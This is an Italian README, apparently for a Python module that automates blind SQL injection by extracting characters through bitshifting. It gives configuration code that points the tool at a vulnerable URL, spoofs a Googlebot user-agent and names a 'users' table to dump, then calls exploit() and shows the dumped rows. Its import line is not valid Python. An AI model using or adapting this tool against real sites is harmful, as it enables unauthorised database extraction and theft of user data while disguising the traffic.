
Un modulo di SQL injection blind che utilizza il bitshfting per calcolare i caratteri.
Questo è un modulo che esegue blind SQL injection utilizzando il metodo del bitshifting per calcolare i caratteri invece di indovinarli. Richiede 7/8 richieste per carattere, a seconda della configurazione.
import blind-sql-bitshifting as x
# Edit this dictionary to configure attack vectors
x.options
# Vulnerable link
x.options["target"] = "http://www.example.com/index.php?id=1"
# Specify cookie (optional)
x.options["cookies"] = ""
# Specify a condition for a specific row, e.g. 'uid=1' for admin (optional)
x.options["row_condition"] = ""
# Boolean option for following redirections
x.options["follow_redirections"] = 0
# Specify user-agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
# Specify table to dump
x.options["table_name"] = "users"
# Specify columns to dump
x.options["columns"] = "id, username"
# String to check for on page after successful statement
x.options["truth_string"] = "<p id='success'>true</p>"
# See below
x.options["assume_only_ascii"] = 1
L'opzione assume_only_ascii fa sì che il modulo assuma che i caratteri estratti siano tutti ASCII. Poiché il set di caratteri ASCII arriva solo fino a 127, possiamo impostare il primo bit a 0 e non preoccuparci di calcolarlo. Si tratta di una riduzione del 12.5% delle richieste. Testando localmente, questo ha prodotto un aumento medio della velocità del 15%. Ovviamente ciò può causare problemi durante l'estrazione di caratteri al di fuori del range ASCII. Per impostazione predefinita è impostato su 0.
Una volta configurato:
data = x.exploit()
Restituisce un array bidimensionale, con ogni sotto-array contenente una singola riga, la prima delle quali sono le intestazioni delle colonne.
Esempio di output:
[['id', 'username'], ['1', 'user1'], ['2', 'user2'], ['3', 'user3'], ['4', 'user4']]
Opzionalmente, i tuoi script possono poi sfruttare il modulo tabulate per visualizzare i dati:
from tabulate import tabulate
data = x.exploit()
print tabulate(data,
headers='firstrow', # This specifies to use the first row as the column headers.
tablefmt='psql') # Using the SQL output format. Other formats can be used.
Questo produrrebbe:
+------+------------+
| id | username |
|------+------------|
| 1 | user1 |
| 2 | user2 |
| 3 | user3 |
| 4 | user4 |
+------+------------+